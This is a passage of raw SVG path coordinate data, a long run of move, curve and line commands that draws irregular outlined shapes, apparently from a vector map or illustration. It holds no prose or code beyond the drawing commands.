577.06028,186.00629 574.62756,186.01531 C 565.90517,186.04767 565.93203,190.02402 574.65754,190.45337 C 577.3209,190.58442 580.175,190.14949 581,189.48685 C 581.825,188.82421 583.625,187.96321 585,187.57352 C 586.375,187.18382 589.075,186.42757 591,185.89295 C 594.0297,185.05153 609.51612,183.91296 621.21414,183.67158 C 625.69753,183.57907 627.12459,184.70451 624.73734,186.45011 C 623.16096,187.60279 623.13857,187.87011 624.52222,189.01844 C 625.89678,190.15922 625.82384,190.55862 623.859,192.65009 L 621.65137,195 L 623.8847,195 C 625.11304,195 625.88183,195.38218 625.59315,195.84929 C 624.80231,197.12888 629.61834,199.36043 631.56149,198.61478 C 633.96032,197.69426 639.88182,200.05227 640.56329,202.19941 C 640.92592,203.34194 642.11518,204.00192 643.81739,204.00526 C 645.29282,204.00816 647.85,204.87527 649.5,205.93217 C 653.16662,208.2808 652.76077,208.1984 654.93384,207.03541 z M 700.00836,193.03114 C 697.89526,191.68838 699.68426,190.37032 704.5,189.72186 C 706.7,189.42562 707.9375,189.40451 707.25,189.67495 C 706.5625,189.9454 706,190.80417 706,191.58333 C 706,192.3625 705.5868,193 705.08179,193 C 704.57677,193 703.56427,193.22027 702.83179,193.4895 C 702.0993,193.75872 700.82876,193.55246 700.00836,193.03114 z M 670.01008,191.10761 C 668.64063,190.72645 667.96614,190.13896 668.51122,189.80208 C 669.91791,188.9327 679,190.08257 679,191.13005 C 679,192.13558 673.65546,192.12224 670.01008,191.10761 z M 590,178 C 590,177.45 590.45,177 591,177 C 591.55,177 592,177.45 592,178 C 592,178.55 591.55,179 591,179 C 590.45,179 590,178.55 590,178 z M 615.70044,178.26631 C 615.45967,177.84484 614.95946,175.81929 614.58886,173.76508 C 614.0445,170.74777 614.19196,170.13643 615.35637,170.58326 C 617.053,171.23432 618.50003,169.42707 617.01631,168.51008 C 615.30824,167.45444 615.88112,165.13399 618.14954,163.91997 C 620.20222,162.82141 620.27264,162.93247 619.71241,166.38479 C 619.36684,168.5143 619.53567,170 620.12324,170 C 620.67186,170 620.98107,171.6875 620.81037,173.75 C 620.63966,175.8125 620.05,177.50689 619.5,177.51531 C 618.95,177.52373 617.96859,177.86858 617.3191,178.28162 C 616.6696,178.69467 615.9412,178.68778 615.70044,178.26631 z M 619.77383,173.75005 C 619.68267,170.54388 618.52909,169.35812 617.32575,171.23369 C 615.85356,173.5283 616.31411,176.57143 618.13356,176.57143 C 619.3733,176.57143 619.83163,175.78306 619.77383,173.75005 z M 618.60417,165.27083 C 617.58765,164.25432 616.74892,165.78472 617.58295,167.13421 C 618.21298,168.15363 618.44853,168.15442 618.78725,167.13825 C 619.01885,166.44346 618.93646,165.60313 618.60417,165.27083 z M 594.54271,176.0691 C 593.76987,174.81862 595.7452,173.68824 597.51586,174.36771 C 598.29691,174.66743 599.20646,174.47497 599.53707,173.94001 C 599.86769,173.40506 600.614,173.26144 601.19553,173.62085 C 601.77707,173.98026 600.79431,174.8876 599.01163,175.63716 C 595.15968,177.25678 595.27014,177.24611 594.54271,176.0691 z M 621.26917,205.1825 C 621.14221,204.59538 622.20576,203.19671 623.63262,202.07434 C 626.31918,199.9611 626.30873,197 623.61472,197 C 621.45553,197 621.04769,194.74454 622.8361,192.69406 C 624.10041,191.24448 624.17663,190.51247 623.22233,188.9844 C 622.24747,187.4234 622.34548,186.88293 623.76672,185.98229 C 624.92955,185.24541 625.00633,185.02311 624,185.30683 C 623.175,185.53943 621.63015,185.28065 620.567,184.73175 C 618.02403,183.41883 614.74905,187.15197 615.57097,190.42674 C 615.91372,191.79238 615.52584,193.14862 614.56429,193.94665 C 612.45187,195.69979 612.57722,196.44077 615.52413,199.62054 C 616.91241,201.11851 618.31611,203.4113 618.64347,204.71562 C 619.20918,206.96957 621.75342,207.42198 621.26917,205.1825 z M 710.90262,199.56929 C 710.63954,199.30621 709.82854,200.08299 709.10039,201.29548 C 707.83547,203.40179 707.85678,203.4231 709.57872,201.77381 C 710.56995,200.8244 711.1657,199.83237 710.90262,199.56929 z M 1047.703,201.10392 C 1048.6777,199.54325 1048.5433,198.8967 1046.9436,197.44893 C 1045.8746,196.48153 1044.9507,195.87227 1044.8904,196.09501 C 1044.8301,196.31776 1044.6577,197.9625 1044.5074,199.75 C 1044.2013,203.38938 1045.8417,204.08439 1047.703,201.10392 z M 722.62689,196.92995 C 729.32072,193.23488 730.64341,191.76517 730.08333,188.64474 C 729.99891,188.17435 730.50812,187.08595 731.21491,186.22609 C 732.35327,184.8412 732.10037,184.75014 729,185.42855 C 727.075,185.84978 723.25,186.26317 720.5,186.34721 C 715.37714,186.50375 713.09265,187.97801 713.0318,191.16667 C 713.01431,192.08333 713.51453,193.00484 714.1434,193.21447 C 714.98791,193.49597 714.96673,194.19365 714.06238,195.88345 C 713.38895,197.14176 712.58529,197.91863 712.27648,197.60981 C 711.96766,197.301 712.28422,196.36246 712.97994,195.52417 C 713.67566,194.68587 713.9019,194 713.48269,194 C 713.06348,194 712.17434,194.7469 711.50683,195.65977 C 710.53309,196.99145 710.60464,197.68331 711.86883,199.15977 C 712.73544,200.1719 713.85157,201 714.34913,201 C 714.84669,201 718.57168,199.16848 722.62689,196.92995 z M 1054,197.10699 C 1054,196.61583 1053.3479,195.96375 1052.5509,195.65792 C 1051.5824,195.28626 1051.2863,195.58241 1051.6579,196.55093 C 1052.2649,198.13266 1054,198.54461 1054,197.10699 z M 1068.1606,191.55098 C 1071.388,192.57531 1078.5692,188.97954 1079.7981,185.7239 C 1080.3939,184.14558 1080.6671,182.29614 1080.4054,181.61402 C 1080.1436,180.9319 1080.8453,179.54496 1081.9647,178.53192 C 1084.2642,176.45092 1084.6113,173.70153 1082.75,172.31109 C 1080.3416,170.51194 1078.5071,171.42773 1078.1991,174.58286 C 1077.7441,179.24485 1071.6163,185.24657 1067.1058,185.44794 C 1066.339,185.48217 1065.214,186.40789 1064.6058,187.50509 C 1063.9976,188.60229 1063.3988,189.67622 1063.2751,189.8916 C 1063.1514,190.10698 1060.6764,190.35093 1057.7751,190.43373 C 1052.0978,190.59574 1047.539,192.44506 1048.597,194.15694 C 1049.0324,194.86146 1049.5162,194.78286 1050.0488,193.92106 C 1050.6933,192.87819 1051.189,192.90585 1052.6157,194.0643 C 1053.5882,194.85394 1054.0798,194.99229 1053.7082,194.37175 C 1053.287,193.66851 1054.2035,193.0093 1056.1412,192.62175 C 1061.1155,191.62689 1062.2781,191.83301 1061.6037,193.59024 C 1060.38,196.77914 1062.31,197.13807 1064.2453,194.08151 C 1065.7214,191.7502 1066.7315,191.09738 1068.1606,191.55098 z M 1058.3705,194.47686 C 1058.8474,193.2342 1058.5908,193.14861 1056.9775,194.01204 C 1054.6594,195.25264 1054.4397,196 1056.393,196 C 1057.1592,196 1058.049,195.31459 1058.3705,194.47686 z M 865.97686,190.47212 C 865.3049,189.66245 863.95836,189 862.98454,189 C 860.2824,189 859.84587,191.65372 862.28194,193.27121 C 864.11593,194.48893 864.64602,194.49683 865.81893,193.32392 C 866.91367,192.22918 866.94629,191.64021 865.97686,190.47212 z M 1038.25,190.75497 C 1039.6157,190.84919 1040,190.08317 1040,187.26659 C 1040,182.73373 1037.7865,180.127 1034.4749,180.76006 C 1032.8143,181.0775 1031.9632,181.93508 1031.8882,183.36658 C 1031.8267,184.53996 1031.6066,186.96985 1031.399,188.76634 C 1031.0386,191.8854 1031.1451,192.00115 1033.7608,191.33346 C 1035.2674,190.94889 1037.2875,190.68857 1038.25,190.75497 z M 574.47251,184.96404 C 578.96692,184.9239 584.22358,181.43583 584.46403,178.33412 C 584.72789,174.93037 588.35878,170.77513 592.69231,168.91757 C 598.80274,166.29833 598.68383,166.20344 589,165.97116 C 587.625,165.93818 584.84023,165.27092 582.81162,164.48835 C 578.45556,162.80794 563.15373,161.56098 558.22815,162.48502 L 554.77599,163.13265 L 557.03336,165.5355 C 558.27491,166.85707 559.67933,167.69818 560.15431,167.40463 C 560.62928,167.11108 561.99799,167.18198 563.19589,167.56217 C 565.02112,168.14148 565.14115,168.43537 563.93694,169.37672 C 562.53945,170.46916 562.11242,172.3068 561.8169,178.5 C 561.73817,180.15 561.18466,181.83061 560.58688,182.23469 C 559.91005,182.6922 560.11684,182.97515 561.13499,182.98469 C 562.03423,182.99311 563.51531,184.13751 564.42626,185.5278 C 565.97061,187.88477 566.22994,187.95235 568.26377,186.5278 C 569.46346,185.68751 572.25738,184.98382 574.47251,184.96404 z M 705.70201,185.76215 C 706.36312,185.25209 707.78775,185.11525 708.86786,185.45806 C 709.94796,185.80087 711.11049,185.63024 711.45124,185.07889 C 711.82059,184.48127 712.96517,184.40757 714.2854,184.8964 C 716.85284,185.84702 723.5121,185.57113 730.10686,184.24093 C 732.64063,183.72985 736.35313,183.37861 738.35686,183.46041 C 740.36059,183.5422 742,183.5816 742,183.54796 C 742,183.51432 741.55575,181.93777 741.01277,180.04452 C 740.28186,177.49598 740.34677,176.39823 741.26277,175.81644 C 742.13505,175.26242 741.9838,175.02611 740.75,175.01531 C 739.7875,175.00689 739,174.55 739,174 C 739,170.34004 737.62416,169.90659 728.30348,170.63011 C 721.53069,171.15584 718.56094,170.863 711.20637,168.9442 L 702.30577,166.62204 L 698.84218,168.66561 C 696.61716,169.9784 694.1487,170.57967 691.93929,170.34702 C 689.42336,170.08209 689.02257,170.21026 690.44645,170.82442 C 692.26417,171.60847 692.2311,171.70727 689.94645,172.31834 C 688.6009,172.67823 685.5875,172.97884 683.25,172.98635 C 680.9125,172.99386 679,173.45 679,174 C 679,174.55 679.47656,175 680.05902,175 C 680.64148,175 680.83992,175.45 680.5,176 C 680.16008,176.55 680.33269,177 680.88357,177 C 681.43445,177 681.72612,177.82585 681.53173,178.83523 C 681.0145,181.52102 681.94958,182.51046 687.4344,185.08102 C 690.90657,186.70831 692.48701,187.03896 692.76773,186.1968 C 693.28873,184.63382 695.88576,184.73071 698.94962,186.42745 C 701.36848,187.767 703.35746,187.57103 705.70201,185.76215 z M 773.75,185.01365 C 775.59185,184.99353 775.37109,178.07963 773.50574,177.36383 C 772.6839,177.04846 772.26046,176.38758 772.56476,175.89522 C 772.86906,175.40285 772.58902,175 771.94244,175 C 771.22473,175 770.95476,174.01697 771.24931,172.47613 C 771.51467,171.08801 771.34213,169.71145 770.86589,169.41712 C 770.38965,169.12278 770,168.3215 770,167.63649 C 770,165.74684 777.42942,165.60757 778.97367,167.46827 C 781.27312,170.23895 782,169.08502 782,162.66395 L 782,156.3279 L 787.84536,154.70275 C 791.0603,153.80891 794.2654,152.38514 794.9678,151.5388 C 795.6702,150.69246 797.77516,150 799.6455,150 C 803.01066,150 803.02962,150.02517 801.4644,152.414 C 799.96586,154.70105 800.00077,154.86547 802.12828,155.54072 C 804.26852,156.22 804.28777,156.31641 802.53856,157.59546 C 801.0821,158.66045 800.94869,159.23325 801.8923,160.37023 C 802.78505,161.44592 804.57707,161.66734 809.08336,161.25873 C 814.34219,160.78187 815.33401,160.9814 817.09369,162.87019 C 818.19828,164.05582 818.82752,165.47007 818.492,166.01295 C 818.15648,166.55583 818.35852,167 818.94098,167 C 819.52344,167 820,167.675 820,168.5 C 820,171.24113 827.07026,170.3413 832.47776,166.91197 C 835.87536,164.75728 838.21466,163.95128 840.21757,164.24524 C 841.79634,164.47695 843.29869,164.32573 843.55613,163.90918 C 844.07954,163.06228 861.14705,163.59451 864.16312,164.55177 C 868.09645,165.80016 870.30199,160.15424 866.76885,157.88142 C 865.3534,156.97088 871.76039,154.97832 873.77818,155.70153 C 874.72518,156.04095 875.18045,155.96491 874.78988,155.53255 C 873.60384,154.21957 876.96454,148.77241 878.57853,149.39176 C 881.27249,150.42553 886,148.86527 886,146.94239 C 886,145.9482 886.85843,144.86232 887.90762,144.52932 C 890.8915,143.58228 891.26225,141.25 888.42892,141.25 C 887.10212,141.25 884.55033,140.1774 882.75827,138.86645 C 880.04145,136.879 878.36772,136.49676 872.68633,136.56627 L 865.87266,136.64964 L 862.8808,132.48355 C 859.1639,127.30785 853.8282,124.4864 850.81097,126.10116 C 848.21944,127.48811 843.13524,127.90571 842.75431,126.76292 C 842.51886,126.05659 839.89262,125.42673 835.69098,125.0689 C 835.24602,125.031 835.14086,124.58109 835.45729,124.0691 C 836.65594,122.12965 830.20812,120.23073 827.10941,121.6106 C 824.70788,122.68 818.26621,123.98995 813.13251,124.45288 C 811.68463,124.58344 808.29598,125.04603 805.60219,125.48084 C 800.92799,126.23533 800.81239,126.32923 803.07023,127.53759 L 805.43608,128.80375 L 802.96804,129.17562 C 801.61062,129.38014 800.6125,130.0993 800.75,130.77374 C 800.8875,131.44818 800.2125,132.03655 799.25,132.08122 C 798.08313,132.13537 798.44674,132.581 800.34122,133.41857 C 802.97341,134.5823 803.0619,134.79524 801.54404,136.3131 C 800.3292,137.52794 798.81913,137.80758 795.70282,137.3948 C 790.40027,136.69242 784.36024,136.64679 780.54011,137.28025 C 778.88729,137.55432 776.64801,137.16025 775.46921,136.38787 C 771.76037,133.95775 764.03195,133.81714 760.31843,136.11222 C 758.51809,137.22489 757.08823,138.44232 757.14096,138.81763 C 757.40802,140.71827 756.85429,141.12396 755.51273,140.01057 C 753.63511,138.45228 750.60219,139.52093 751.35257,141.4764 C 751.66062,142.27915 751.47885,143.20405 750.94866,143.53173 C 749.72056,144.29074 751.61502,146.13148 755.30639,147.76592 C 756.8499,148.44934 757.86018,149.41721 757.55146,149.91674 C 757.24273,150.41627 758.22986,150.62171 759.74507,150.37327 C 765.52033,149.42636 770.68638,149.19099 771.60837,149.83277 C 772.13557,150.19975 772.55186,151.70375 772.53346,153.175 C 772.50325,155.5902 772.21761,155.79352 769.59244,155.26849 C 767.01943,154.75389 766.74766,154.92705 767.2305,156.77342 C 767.69363,158.54444 767.33951,158.84745 764.88806,158.77775 C 762.07598,158.6978 760.63342,157 763.37756,157 C 764.13521,157 765.31531,156.325 766,155.5 C 766.68469,154.675 768.04164,154 769.01546,154 C 770.99609,154 772.63272,151.04367 770.71862,150.92349 C 770.04838,150.88141 768.64615,150.68649 767.60257,150.49033 C 765.50717,150.09648 758,153.02472 758,154.2359 C 758,154.65616 756.90532,155 755.56739,155 C 752.71278,155 750.93775,158.72546 753.14299,160.08837 C 753.88934,160.54965 754.3875,161.16846 754.25,161.46353 C 753.17653,163.76707 757.56858,169.853 761.35228,171.30494 C 762.25853,171.6527 763,172.38723 763,172.93723 C 763,173.48723 762.325,173.67821 761.5,173.36163 C 760.46758,172.96545 760,173.42442 760,174.83399 C 760,175.96038 759.55,177.16008 759,177.5 C 758.45,177.83992 758.00043,178.87898 758.00095,179.80902 C 758.0021,181.84935 767.51532,186.17005 770.5,185.48581 C 771.6,185.23364 773.0625,185.02116 773.75,185.01365 z M 769,164.85457 C 767.625,164.37518 765.94727,162.74929 765.2717,161.24148 L 764.0434,158.5 L 766.2717,161.01512 C 767.49727,162.39844 768.95,163.63594 769.5,163.76512 C 771.66634,164.27395 772.47793,164.74826 772,165.22619 C 771.725,165.50119 770.375,165.33396 769,164.85457 z M 840.45475,184.43769 C 841.76616,183.57842 843.43783,182.95674 844.16957,183.05618 C 846.86784,183.42284 848,182.96288 848,181.5 C 848,180.675 847.31088,180 846.46862,180 C 845.62635,180 844.67691,179.32162 844.35874,178.49249 C 844.04058,177.66336 842.5922,176.99675 841.14013,177.01114 C 834.38479,177.07811 829.43462,176.49061 828.75,175.54067 C 827.75307,174.15737 825.84719,176.9656 826.34865,179.07896 C 826.55471,179.94739 826.11056,181.4959 825.36165,182.52009 C 824.61274,183.54428 824,183.87281 824,183.25015 C 824,182.62748 824.47232,181.82612 825.04961,181.46934 C 825.69501,181.07046 825.27456,180.10542 823.95779,178.96339 C 821.91162,177.18876 822.00012,175 824.11803,175 C 824.66803,175 824.79695,175.51953 824.40451,176.15451 C 823.96243,176.86981 824.13019,177.03757 824.84549,176.59549 C 825.48047,176.20305 826,175.05667 826,174.04797 C 826,172.12008 824.13252,171 820.91821,171 C 819.8632,171 819,170.325 819,169.5 C 819,168.675 818.50186,168 817.89301,168 C 817.28417,168 817.00911,167.41865 817.28177,166.70811 C 817.55443,165.99757 817.16869,164.58361 816.42458,163.56597 C 815.28348,162.00543 814.14374,161.79987 809.14535,162.2531 C 804.86372,162.64135 802.83779,162.40921 801.84522,161.41664 C 800.6801,160.25153 800.05576,160.25844 797.73569,161.4621 C 796.23106,162.24271 795,162.45808 795,161.9407 C 795,161.42331 794.13032,161 793.06739,161 C 791.00703,161 789.41321,157.75846 790.56068,155.90181 C 791.00859,155.17708 790.59292,154.9708 789.37523,155.31352 C 782.5962,157.22149 783,156.73715 783,162.9604 C 783,167.21624 783.40419,168.94113 784.5,169.36163 C 785.40438,169.70867 786,169.36676 786,168.50055 C 786,167.71038 787.19249,166.43907 788.64998,165.67541 C 791.86668,163.99001 796.67589,165.40346 797.59678,168.30492 C 798.03628,169.68968 798.79954,170.01614 800.56283,169.57359 C 802.45949,169.09755 803.22912,169.5424 804.38881,171.78498 C 805.74536,174.40826 813.0796,178.84962 818.76452,180.4904 C 820.01001,180.84988 820.81162,181.49579 820.54588,181.92577 C 820.28014,182.35575 821.16918,183.21168 822.52152,183.82785 C 824.59408,184.77217 825.84293,184.50062 830.47152,182.09915 C 836.38399,179.03158 838.45479,179.54487 837.34152,183.80204 C 836.65971,186.40926 837.25901,186.53162 840.45475,184.43769 z M 639.26566,183.09214 C 639.70233,181.4223 639.21681,181.19255 635.37413,181.25064 C 632.95938,181.28715 631.11195,181.44528 631.26872,181.60206 C 631.85256,182.18589 637.52357,184.98791 638.13337,184.99384 C 638.48172,184.99723 638.99125,184.14146 639.26566,183.09214 z M 665.72701,183.02608 C 665.56082,180.81987 663.40028,179.54332 662.44594,181.08748 C 661.78841,182.15138 663.69187,185 665.0603,185 C 665.50877,185 665.80879,184.11174 665.72701,183.02608 z M 559.51541,182.30982 C 560.31316,181.21883 560.47119,179.64294 559.96118,177.86464 C 559.46176,176.12327 559.5636,174.9788 560.23797,174.75401 C 560.82478,174.55841 561.37009,173.51333 561.44978,172.4316 C 561.52948,171.34988 561.9588,169.87568 562.40384,169.15559 C 563.02345,168.15304 562.49736,167.95913 560.15805,168.32781 C 558.36322,168.61068 556.90815,168.33301 556.63049,167.65464 C 556.37056,167.01959 556.12237,167.7375 556.07895,169.25 C 556.03553,170.7625 555.97804,172.3375 555.9512,172.75 C 555.92437,173.1625 555.20269,174.56791 554.34748,175.87312 C 553.49227,177.17834 553.28922,177.93928 553.89627,177.56411 C 555.00335,176.8799 555.22771,177.56962 555.25794,181.75 C 555.27729,184.42679 557.73147,184.74949 559.51541,182.30982 z M 665.5,174.67702 C 665.5,170.32092 663.27843,169.72157 659.84784,173.15216 C 657.82072,175.17928 657.79749,175.37875 659.44798,176.58562 C 660.41174,177.29034 660.92721,178.30876 660.59347,178.84877 C 660.21306,179.46428 661.01516,179.55504 662.74333,179.09203 C 665.11841,178.45569 665.5,177.84455 665.5,174.67702 z M 644.96105,175.97592 C 643.0349,174.7855 644.65426,171.64682 646.75843,172.49218 C 650.7659,174.10221 651.45195,174.12412 649.55887,172.58164 C 648.49125,171.71174 646.91625,170.99181 646.05887,170.9818 C 644.15476,170.95958 637.47252,166.4697 633.79545,162.74188 C 632.30795,161.23385 630.67291,160 630.16203,160 C 629.65115,160 629.00746,158.81934 628.7316,157.3763 C 628.35263,155.39381 628.69072,154.63213 630.11503,154.25967 C 631.15176,153.98856 632,153.14422 632,152.38337 C 632,150.74586 623.98728,150.41272 622.41513,151.98487 C 621.52711,152.87289 617.20713,153.75354 612.86111,153.93251 C 611.95972,153.96963 611.24311,154.5625 611.26865,155.25 C 611.29418,155.9375 611.23049,157.4 611.12713,158.5 C 610.96384,160.23761 610.81591,160.28909 609.99959,158.89239 C 609.48281,158.00821 609.24566,156.32071 609.47258,155.14239 C 609.79189,153.48432 609.3895,152.99337 607.69258,152.97069 C 605.62229,152.94301 605.66732,152.78477 608.5,150.13359 C 610.15,148.58932 612.03331,146.40535 612.68513,145.28034 C 613.78205,143.38714 613.56109,143.18543 609.71692,142.57072 C 607.43257,142.20544 602.9483,140.5776 599.75187,138.95329 C 593.35772,135.70401 591.52043,135.30788 592.30301,137.34726 C 592.96079,139.0614 585.65908,142.40562 582.85799,141.67311 C 581.39979,141.29179 580.99353,141.54075 581.38963,142.57296 C 581.99014,144.13789 581.32287,144.32079 575.75,144.1188 C 573.6875,144.04404 572,144.43673 572,144.99144 C 572,145.54615 572.65383,146 573.45295,146 C 576.19168,146 580.08347,148.34009 579.57002,149.67812 C 579.08992,150.92924 580.28387,151.4822 582.5,151.03509 C 583.05,150.92412 583.17839,151.15495 582.78531,151.54803 C 582.39222,151.94111 582.68848,153.14485 583.44365,154.22301 C 584.64065,155.93197 584.57202,156.42798 582.90835,158.09165 C 581.85876,159.14124 581,160.63098 581,161.40217 C 581,162.97771 586.36146,165.18226 588.34346,164.4217 C 589.05137,164.15005 590.72619,164.3349 592.06528,164.83248 C 594.03534,165.56452 594.9203,165.28513 596.70225,163.36859 C 599.07861,160.81274 601.95454,160.37012 605.1328,162.07107 C 606.68506,162.90182 607.73611,162.73973 609.81706,161.34869 C 611.29268,160.36229 612.88487,159.67109 613.35526,159.8127 C 613.82565,159.95431 614.83231,159.55413 615.59227,158.92342 C 617.56946,157.2825 621.88616,158.65605 623.09584,161.311 C 623.66114,162.55171 625.44455,164.45179 627.05896,165.53341 C 628.67337,166.61504 629.99554,167.8375 629.99712,168.25 C 629.99871,168.6625 631.125,169 632.5,169 C 633.875,169 635,169.45 635,170 C 635,170.55 635.9,171 637,171 C 638.1,171 639,171.45 639,172 C 639,172.55 639.60277,173 640.33948,173 C 641.0762,173 642.20312,174.15037 642.84374,175.55639 C 643.50628,177.0105 644.48389,177.81897 645.11102,177.43139 C 645.88969,176.95014 645.84564,176.52264 644.96105,175.97592 z M 745.96172,173.16459 C 745.42592,172.98011 745.2419,172.41761 745.55279,171.91459 C 745.86367,171.41157 744.76803,171 743.11803,171 C 738.82518,171 738.35041,172.72585 742.20428,174.32155 C 744.54384,175.29025 745.7083,175.36903 746.21795,174.59308 C 746.61283,173.99188 746.49753,173.34907 745.96172,173.16459 z M 831.85676,173.89031 C 830.74668,173.18693 830.77272,173.0063 832,172.89683 C 832.825,172.82324 834.12296,172.84996 834.88435,172.95621 C 835.64574,173.06245 837.44574,172.83921 838.88435,172.46011 C 841.30222,171.82295 841.34877,171.71338 839.5,171.01105 C 838.4,170.59317 836.75975,170.63527 835.85501,171.10462 C 834.05071,172.04061 831.47015,169.89554 832.75868,168.53081 C 833.1664,168.09897 832.02279,168.49704 830.2173,169.41541 C 828.39459,170.34254 827.22712,171.55847 827.5923,172.14935 C 828.03009,172.85771 828.53744,172.75988 829.10969,171.85676 C 829.58252,171.11054 830.03252,170.8375 830.10969,171.25 C 830.18686,171.6625 830.3625,172.45 830.5,173 C 830.6375,173.55 830.80625,174.47656 830.875,175.05902 C 830.94375,175.64148 831.49804,175.81023 832.10676,175.43402 C 832.87829,174.95719 832.80257,174.48961 831.85676,173.89031 z M 846.86882,173.90758 C 848.18552,172.68089 849.92314,172.00814 851.02833,172.29716 C 852.07231,172.57016 853.44811,172.16499 854.08568,171.39677 C 854.72324,170.62854 856.42729,169.98569 857.87244,169.9682 C 859.3176,169.9507 861.35379,169.29012 862.39732,168.50023 C 863.44085,167.71034 864.67835,167.30121 865.14732,167.59105 C 865.61629,167.88089 866,167.6718 866,167.1264 C 866,165.57769 862.96526,164.97006 853.10236,164.54399 C 847.74484,164.31254 844.20757,164.52683 844.53879,165.06277 C 844.86943,165.59775 843.15357,165.70866 840.3953,165.3306 C 837.20769,164.89368 835.89754,165.0252 836.338,165.73787 C 836.69578,166.31678 836.28758,167.05941 835.43087,167.38815 C 834.57417,167.7169 834.16682,168.4609 834.52565,169.0415 C 834.92917,169.69441 835.62095,169.74809 836.33903,169.18219 C 837.07796,168.59987 838.51014,168.89256 840.27873,169.98734 C 842.44323,171.3272 842.7748,171.94201 841.77873,172.76867 C 840.36767,173.93975 840.10938,174 836.5,174 C 831.62278,174 834.0849,175.57406 839.30372,175.79245 C 843.51358,175.96861 845.07384,175.57987 846.86882,173.90758 z M 658.10859,171.875 C 657.89332,171.11875 657.7565,169.66401 657.80456,168.64225 C 657.85277,167.61727 657.05064,166.5645 656.01516,166.29371 C 654.83183,165.98427 654.35346,165.24247 654.72047,164.28606 C 655.18212,163.08302 654.80575,162.91977 652.90127,163.497 C 650.93922,164.09167 650.72864,163.98474 651.75,162.91239 C 655.27179,159.21481 651.64757,156.35535 644.49729,157.19011 C 642.57378,157.41467 641,157.23876 641,156.7992 C 641,155.94839 643.46738,155.68608 648.75,155.9753 C 650.5375,156.07316 652,155.71089 652,155.17024 C 652,154.62959 651.16708,154.40505 650.14908,154.67127 C 649.13107,154.93748 647.56669,154.42383 646.67269,153.52983 C 644.90264,151.75978 642.51393,152.4709 639.98206,155.52162 C 638.84226,156.895 638.8477,157.28784 640.01656,158.01023 C 640.77993,158.48202 641.83997,158.59891 642.37219,158.26997 C 642.95237,157.9114 643.05044,158.42618 642.61709,159.55547 C 642.21955,160.59143 642.20233,161.13101 642.57881,160.75452 C 643.26878,160.06455 651.03207,164.09363 654.21782,166.79506 C 655.44923,167.83927 655.67485,168.73903 655.01463,169.97267 C 654.4109,171.10074 654.49519,172.09519 655.2593,172.8593 C 656.73859,174.33859 658.62443,173.68712 658.10859,171.875 z M 684.5,171 L 681.5,170.23663 L 684.5,170.103 C 686.82527,169.99943 687.16264,169.75135 686,169 C 684.19336,167.83246 680,167.68373 680,168.7872 C 680,169.22015 678.9875,169.64402 677.75,169.72911 C 675.56322,169.87949 675.55454,169.84332 677.44113,168.44192 C 678.50875,167.64886 680.19625,167 681.19113,167 C 682.18601,167 682.92856,166.6625 682.84124,166.25 C 682.75392,165.8375 683.0445,164.66708 683.48696,163.64908 C 684.5426,161.22028 682.29775,159.74822 679,160.70675 C 677.625,161.10641 674.2932,161.44839 671.59601,161.4667 C 667.47681,161.49467 666.64186,161.82007 666.37862,163.5 C 665.75211,167.49836 666.96534,169.12481 670.33412,168.80271 C 672.13869,168.63016 673.42181,168.94956 673.31816,169.54551 C 673.21815,170.12054 674.34315,170.54605 675.81816,170.49108 C 677.29317,170.43612 679.4,170.72461 680.5,171.13219 C 681.6,171.53976 683.625,171.84851 685,171.8183 C 687.27355,171.76835 687.22825,171.69422 684.5,171 z M 663.4349,170.02475 C 667.15029,168.61216 666.58823,166.89773 662.5,167.17306 C 659.88698,167.34904 659,167.86382 659,169.20439 C 659,171.25181 659.81228,171.40207 663.4349,170.02475 z M 698.25967,168.0093 C 701.5852,166.04719 709.98334,165.53518 709.99482,167.29384 C 709.99767,167.73045 710.5625,167.99578 711.25,167.88347 C 711.9375,167.77115 713.76679,168.20143 715.3151,168.83963 C 718.60569,170.19599 728.87721,170.36381 730.88219,169.09397 C 732.05684,168.35002 732.05772,167.75169 730.88808,165.10928 C 730.13111,163.39918 729.14507,162 728.69687,162 C 728.24867,162 728.16008,162.45 728.5,163 C 729.526,164.6601 728.04797,164.13436 724.68328,161.64238 C 718.02946,156.7144 715.56336,156.03241 709.84862,157.53993 C 704.64684,158.91214 702.45474,158.69127 703.55802,156.90613 C 703.88287,156.3805 703.77771,156.01489 703.32433,156.09364 C 700.73623,156.54323 699.78807,155.96028 700.90955,154.60898 C 701.83728,153.49114 701.45633,153.00613 698.96983,152.13933 C 695.4859,150.92482 692.38849,152.20062 691.4211,155.24859 C 691.115,156.21303 689.99503,157.46748 688.93228,158.03625 C 687.86952,158.60501 687,159.95453 687,161.03518 C 687,162.11583 686.59814,163 686.10699,163 C 684.69193,163 683.83026,166.23026 684.94735,167.34735 C 685.50445,167.90445 687.8817,168.67288 690.23013,169.05497 C 692.57856,169.43705 694.58678,169.80599 694.69284,169.87483 C 694.7989,169.94368 696.40398,169.10418 698.25967,168.0093 z M 747.99283,168.87244 C 748.00919,167.44074 744.48593,165.4909 741.59771,165.33327 C 739.89397,165.24028 736.87478,164.7387 734.8884,164.21863 L 731.27679,163.27305 L 732.35689,166.13456 C 733.12179,168.16101 733.93233,168.83887 735.13434,168.45736 C 736.06788,168.16107 737.11771,168.38145 737.4673,168.9471 C 738.13489,170.02728 747.98042,169.95745 747.99283,168.87244 z M 1042.8069,164.47354 C 1042.499,164.16565 1041.9398,164.72065 1041.5643,165.70687 C 1041.0216,167.13207 1041.1365,167.24693 1042.1241,166.26667 C 1042.8075,165.58833 1043.1148,164.78143 1042.8069,164.47354 z M 664.5791,164.56376 C 665.55137,163.59148 665.6678,162.91272 664.9395,162.46261 C 664.34778,162.09691 664.09637,161.19125 664.3808,160.45004 C 664.6674,159.70316 664.07415,158.84092 663.05002,158.51588 C 662.03366,158.1933 660.04118,156.76845 658.62228,155.34955 C 656.09055,152.81783 652.05601,152.66357 653.59729,155.15742 C 653.99552,155.80177 654.4271,157.67329 654.55635,159.31635 C 654.68561,160.95941 655.52277,162.71305 656.41671,163.21333 C 657.31066,163.7136 657.78104,164.54526 657.46202,165.06146 C 656.52001,166.58565 663.01114,166.13172 664.5791,164.56376 z M 1081.7729,164.82713 C 1082.67,163.92996 1083.5703,163.93881 1085.6025,164.86477 C 1087.7945,165.86347 1088.5566,165.80624 1089.9584,164.53764 C 1090.8929,163.69194 1092.4095,163 1093.3287,163 C 1096.0301,163 1095.2429,161.09532 1092.25,160.39024 C 1090.7375,160.03391 1088.2625,158.59115 1086.75,157.18409 L 1084,154.62582 L 1084,157.37865 C 1084,160.91837 1082.2176,164.25254 1080.7953,163.3735 C 1080.1605,162.98116 1079.9719,163.14552 1080.3517,163.76008 C 1080.7151,164.34809 1080.4472,165.05709 1079.7562,165.33564 C 